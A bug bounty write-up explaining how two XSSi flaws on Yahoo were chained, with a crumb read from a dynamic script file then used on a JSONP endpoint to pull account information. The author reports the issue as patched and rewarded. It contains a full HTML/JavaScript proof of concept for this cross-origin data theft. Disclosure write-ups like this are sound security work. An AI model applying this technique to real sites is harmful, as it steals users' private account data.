Yahoo — Two XSSi vulnerabilities chained to steal user information. ($750 Bounty)

While intercepting requests using Burp Suite I noticed the following request:

When I saw that this was a JSONP endpoint I immediately knew this could potentially be an XSSi vulnerability. However, I noticed that if the value for the .crumb GET parameter wasn’t valid it would return the following response:

At this point I realized that if I could somehow steal the victims valid .crumb value, I could successfully steal information about their account. I then searched all requests I intercepted in Burp Suite for my valid crumb and I quickly found it in in a dynamic Javascript file located at: https://messenger.yahoo.com/embed/app.js

If you go to this page now you will not find the logoutCrumb value since they have patched this issue. However, when I initially discovered this issue the file looked like this:

Now, for people that don’t understand how XSSi works the vulnerability essentially takes advantage of Same-Origin Policy (SOP) not being applied to Javascript src attribute within the script tag. I then created the following Proof of Concept which steals the valid .crumb value from the dynamic Javascript file at https://messenger.yahoo.com/embed/app.js and then places the valid crumb in the .crumb GET parameter as seen here https://jsapi.login.yahoo.com/w/device_users?.crumb=POR1.kRjsx. which returns a proper response containing information about the user. Using the code below I was able to extract information:

<html>
<head>
<title>Yahoo XSSi PoC</title>
</head>
<body>
<div style="width: 60%; margin-right: auto; margin-left: auto; margin-bottom: 30px;">
<h1 style="text-align: center;">Proof of Concept</h1>
<b>Dataset 1:</b>
<div id="content1" style="width: 100%; border: 1px solid black; padding: 10px; overflow: scroll; font-family: monospace;"></div>
<br/>
<b>Dataset 2:</b>
<div id="content2" style="width: 100%; border: 1px solid black; padding: 10px; overflow: scroll; font-family: monospace;"></div>
</div>
<script>
function processDeviceUsers(data) {
document.getElementById("content1").innerHTML = JSON.stringify(data);
}
window.onload = function () {
var config = {};
config_data = {};
config.merge = function(data) { config_data = data };
iris.initConfig(config);
document.getElementById("content2").innerHTML = JSON.stringify(config_data);
var src = "https://jsapi.login.yahoo.com/w/device_users?.crumb=" + config_data.session.logoutCrumb;
var s = document.createElement('script');
s.setAttribute('src', src);
document.body.appendChild(s);
}
</script>
<script src="https://messenger.yahoo.com/embed/app.js"></script>
<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
</body>
</html>

Below is a screenshot of the payload I submitted to Yahoo and received a $750 bug bounty. Overall, I had a great time developing the Proof of Concept for this vulnerability chain and I hope others are able to learn a thing or two from this write up.